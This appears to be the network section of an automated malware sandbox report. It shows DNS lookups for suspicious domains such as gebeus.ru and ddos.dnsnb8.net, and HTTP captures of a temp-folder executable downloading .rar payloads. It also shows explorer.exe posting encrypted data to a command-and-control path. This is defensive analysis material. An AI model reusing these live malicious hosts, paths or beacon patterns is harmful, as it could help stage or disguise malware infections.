Jul 24, 2024 19:56:29.066689968 CEST	53	52375	1.1.1.1	192.168.2.10
Jul 24, 2024 19:56:43.066237926 CEST	61850	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:56:43.125749111 CEST	53	61850	1.1.1.1	192.168.2.10
Jul 24, 2024 19:56:50.332357883 CEST	64465	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:56:50.349332094 CEST	53	64465	1.1.1.1	192.168.2.10
Jul 24, 2024 19:56:52.783027887 CEST	53894	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:56:52.790988922 CEST	53	53894	1.1.1.1	192.168.2.10
Jul 24, 2024 19:56:56.004627943 CEST	56513	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:56:56.106863976 CEST	53	56513	1.1.1.1	192.168.2.10
Jul 24, 2024 19:57:17.023515940 CEST	51893	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:57:17.039048910 CEST	53	51893	1.1.1.1	192.168.2.10
Jul 24, 2024 19:58:26.605739117 CEST	62001	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:58:27.594754934 CEST	62001	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:58:28.610470057 CEST	62001	53	192.168.2.10	1.1.1.1
Jul 24, 2024 19:58:30.085942984 CEST	53	62001	1.1.1.1	192.168.2.10
Jul 24, 2024 19:58:30.085961103 CEST	53	62001	1.1.1.1	192.168.2.10
Jul 24, 2024 19:58:30.085971117 CEST	53	62001	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 19:55:04.239382029 CEST	192.168.2.10	1.1.1.1	0x5759	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:05.253161907 CEST	192.168.2.10	1.1.1.1	0x5759	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:06.316844940 CEST	192.168.2.10	1.1.1.1	0x5759	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:38.598268032 CEST	192.168.2.10	1.1.1.1	0x9a	Standard query (0)	evilos.cc	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:39.606379986 CEST	192.168.2.10	1.1.1.1	0x9a	Standard query (0)	evilos.cc	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:40.622288942 CEST	192.168.2.10	1.1.1.1	0x9a	Standard query (0)	evilos.cc	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:43.499428988 CEST	192.168.2.10	1.1.1.1	0x45d5	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:44.512749910 CEST	192.168.2.10	1.1.1.1	0x45d5	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.512440920 CEST	192.168.2.10	1.1.1.1	0x45d5	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:29.008738041 CEST	192.168.2.10	1.1.1.1	0x26c7	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:43.066237926 CEST	192.168.2.10	1.1.1.1	0x13e0	Standard query (0)	funrecipebooks.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:50.332357883 CEST	192.168.2.10	1.1.1.1	0x163a	Standard query (0)	callosallsaospz.shop	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:52.783027887 CEST	192.168.2.10	1.1.1.1	0x5f80	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:56.004627943 CEST	192.168.2.10	1.1.1.1	0xd5	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:57:17.023515940 CEST	192.168.2.10	1.1.1.1	0xf849	Standard query (0)	liernessfornicsa.shop	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:26.605739117 CEST	192.168.2.10	1.1.1.1	0xd22b	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:27.594754934 CEST	192.168.2.10	1.1.1.1	0xd22b	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:28.610470057 CEST	192.168.2.10	1.1.1.1	0xd22b	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 19:55:07.850765944 CEST	1.1.1.1	192.168.2.10	0x5759	No error (0)	ddos.dnsnb8.net	44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:07.850812912 CEST	1.1.1.1	192.168.2.10	0x5759	No error (0)	ddos.dnsnb8.net	44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:07.850853920 CEST	1.1.1.1	192.168.2.10	0x5759	No error (0)	ddos.dnsnb8.net	44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:19.522352934 CEST	1.1.1.1	192.168.2.10	0x25e2	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:19.522352934 CEST	1.1.1.1	192.168.2.10	0x25e2	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:41.434992075 CEST	1.1.1.1	192.168.2.10	0x9a	No error (0)	evilos.cc	127.0.0.127	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:41.435039997 CEST	1.1.1.1	192.168.2.10	0x9a	No error (0)	evilos.cc	127.0.0.127	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:41.435409069 CEST	1.1.1.1	192.168.2.10	0x9a	No error (0)	evilos.cc	127.0.0.127	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885318995 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885332108 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:55:45.885881901 CEST	1.1.1.1	192.168.2.10	0x45d5	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:29.066689968 CEST	1.1.1.1	192.168.2.10	0x26c7	No error (0)	mussangroup.com	185.149.100.242	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:43.125749111 CEST	1.1.1.1	192.168.2.10	0x13e0	No error (0)	funrecipebooks.com	162.0.235.84	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:50.349332094 CEST	1.1.1.1	192.168.2.10	0x163a	No error (0)	callosallsaospz.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:50.349332094 CEST	1.1.1.1	192.168.2.10	0x163a	No error (0)	callosallsaospz.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:52.790988922 CEST	1.1.1.1	192.168.2.10	0x5f80	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:52.790988922 CEST	1.1.1.1	192.168.2.10	0x5f80	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:52.790988922 CEST	1.1.1.1	192.168.2.10	0x5f80	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:56:56.106863976 CEST	1.1.1.1	192.168.2.10	0xd5	No error (0)	store4.gofile.io	31.14.70.245	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:57:17.039048910 CEST	1.1.1.1	192.168.2.10	0xf849	No error (0)	liernessfornicsa.shop	172.67.213.85	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:57:17.039048910 CEST	1.1.1.1	192.168.2.10	0xf849	No error (0)	liernessfornicsa.shop	104.21.77.246	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:11.040081978 CEST	1.1.1.1	192.168.2.10	0xebb9	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:11.040081978 CEST	1.1.1.1	192.168.2.10	0xebb9	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085942984 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085961103 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.181.26.154	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	92.36.226.66	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.199.234.114	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.204.65.18	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	189.165.133.52	A (IP address)	IN (0x0001)	false
Jul 24, 2024 19:58:30.085971117 CEST	1.1.1.1	192.168.2.10	0xd22b	No error (0)	gebeus.ru	187.131.250.134	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

167.235.128.153

107.173.160.137

107.173.160.139

funrecipebooks.com

callosallsaospz.shop

rentry.co

store4.gofile.io

liernessfornicsa.shop

ddos.dnsnb8.net:799

mbcyqmttpiinpghx.com

gebeus.ru

eyqxnblygic.org

elpsnjvbyqt.com

xnmfeyqpwnehurxh.net

eeycidiyfjvuwaep.net

qmbakktwarjac.net

feltxgyoedldtlt.net

wtlgosscvcry.org

77.221.157.163

pkqgdawiidcayk.com

mmcxxioyukngeefd.org

coiniqplnikp.com

sijoltnxjfxqjw.org

uwqwnifeydwej.com

jpenaelwjof.org

64.190.113.113

tfqtvoxxlfyfid.org

mhvibsdewxn.org

akvufandfxiqflw.net

bqhvneiiyelqwiyv.net

oqgvummtqov.com

vxvnjhhjwdcwv.com

wagishcpburncp.com

rhafqfudulgf.org

bmucdlsvjvamj.org

ebgowpcalmic.org

kguhhqwlowh.com

ajhanernmeqt.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49703	44.221.84.105	799	7516	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:07.938378096 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	44.221.84.105	799	7708	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:39.957458019 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	44.221.84.105	799	7708	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:40.415846109 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49713	44.221.84.105	799	7708	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:40.989783049 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49715	44.221.84.105	799	7708	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:42.662909031 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49716	44.221.84.105	799	7708	C:\Users\user\AppData\Local\Temp\IXDaI.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:43.114099026 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49717	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:45.891680002 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mbcyqmttpiinpghx.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: gebeus.ru
Jul 24, 2024 19:55:45.891705990 CEST	214	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 0d ce b9 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu8IEBEfhWYx5`{$,-t\U>U9"HHIDQfnRJ:X7}DU9-R-`
Jul 24, 2024 19:55:46.938671112 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 eb Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49718	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:46.948877096 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eyqxnblygic.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: gebeus.ru
Jul 24, 2024 19:55:46.948895931 CEST	331	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 75 34 c9 8c Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuu4RVSUtWmNu-L?~[.lVkCOQLF=r:G'6^E^Z,G,(&-0Yw'F_]v:uJ.g'-`
Jul 24, 2024 19:55:48.008116007 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:55:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49719	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:55:48.017388105 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://elpsnjvbyqt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: gebeus.ru
Jul 24, 2024 19:55:48.017420053 CEST	160	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 22 48 d3 a7 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu"HrSBQ\|BFUuh(cioZK\%6=U RE
